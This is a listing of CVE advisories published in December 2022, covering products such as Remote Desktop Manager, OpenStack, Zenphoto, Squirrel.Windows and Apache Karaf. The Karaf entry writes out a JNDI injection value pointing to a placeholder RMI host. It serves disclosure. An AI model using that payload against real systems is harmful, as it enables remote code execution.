Security Vulnerabilities - CVEs Published In 2022
Authentication bypass in local application lock feature in Devolutions Remote Desktop Manager 2022.3.26 and earlier on Windows allows malicious user to access the application.
CVSS Score
8.8
EPSS Score
0.001
Published
2022-12-21
BigFix WebUI non-master operators are missing controls that prevent them from being able to modify the relevance of fixlets or to deploy fixlets from the BES Support external site.
CVSS Score
6.4
EPSS Score
0.001
Published
2022-12-21
Insights for Vulnerability Remediation (IVR) is vulnerable to man-in-the-middle attacks that may lead to information disclosure. This requires privileged network access.
CVSS Score
6.4
EPSS Score
0.001
Published
2022-12-21
Insights for Vulnerability Remediation (IVR) is vulnerable to improper input validation. This may lead to information disclosure. This requires privileged access.
CVSS Score
6.4
EPSS Score
0.002
Published
2022-12-21
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.
The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
use InitialContext.lookup(jndiName) without filtering.
An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI when an attacker has
control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.
We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
CVSS Score
9.8
EPSS Score
0.016
Published
2022-12-21
A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.
CVSS Score
8.8
EPSS Score
0.001
Published
2022-12-21
A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.
CVSS Score
8.8
EPSS Score
0.0
Published
2022-12-21
Stored cross-site scripting vulnerability in Zenphoto versions prior to 1.6 allows remote a remote authenticated attacker with an administrative privilege to inject an arbitrary script.
CVSS Score
4.8
EPSS Score
0.003
Published
2022-12-21
Use after free vulnerability in CX-Drive V3.00 and earlier allows a local attacker to execute arbitrary code by having a user to open a specially crafted file,
CVSS Score
7.8
EPSS Score
0.0
Published
2022-12-21
Squirrel.Windows is both a toolset and a library that provides installation and update functionality for Windows desktop applications. Installers generated by Squirrel.Windows 2.0.1 and earlier contain an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with the privilege of the user invoking the installer.
CVSS Score
7.8
EPSS Score
0.002
Published
2022-12-21